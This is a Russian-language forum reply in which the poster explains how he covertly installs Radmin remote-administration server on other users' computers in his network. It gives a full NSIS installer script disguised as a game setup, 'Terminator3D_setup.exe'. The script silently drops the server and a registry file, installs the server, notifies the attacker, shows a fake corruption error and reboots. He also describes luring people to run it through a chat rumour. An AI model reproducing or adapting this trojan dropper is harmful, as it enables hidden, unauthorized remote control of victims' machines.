alexb ... есть решение по-проще ... мною проверенное ...
Значит так, передо мною стояла задача чтобы на всех компах из моей сетки запустить тайком сервер Remote Administrator'a (r_server.exe) ... Ну что-бы иметь полный контроль над ихними компами ... таскать администрирование без выделенного сервера ...
Когда-то тоже пользовался клейщиками, тоесть лепил сервер к инсталяшке какойнибудь игры ...
А теперь пошёл другим путём ... Теперь использую так называемые "Install Builders" ... А именно NullSoft Install System (NSIS) ... Вот привожу исходник своего инсталлятора:
Name "Terminator3D"
OutFile "Terminator3D_setup.exe"
Icon "Icon.ico"
SilentInstall silent
InstallDir $SysDir
Section ""
SetOutPath $InstDir
File "r_server.exe"
File "raddrv.dll"
File "MMVD.reg"
ExecWait '"$WinDir\regedit.exe" /s MMVD.reg'
ExecWait '"$SysDir\r_server.exe" /install /silence'
ExecWait '"$SysDir\net.exe" send MAX Сервер запущен ...'
MessageBox MB_OK|MB_ICONSTOP "The installation file is corupted. Error at 0x098647."
Reboot
SectionEnd
Как видно инсталлятор распаковывает все необходимые файлы, выдаёт ошибку типа игра испорченная, а потом посылает мне сообщение что сервер был запущен ... Теперь ребут и усё ... полный римоут контроль ...
Кстати, если заметили, то инсталяшка называется "Terminator3D_setup" ... Ну чтобы было притягательнее ... Поставил его себе в Games и пустил слух по чату ...
А то что ты хочешь сделать я так и не понял ... Тоесть ты хотел прилепить к какойнибудь программе ВИРУС ? Всёровно когда конечная программа запустится то вирус загрузится отдельно, тоесть пальнётся ...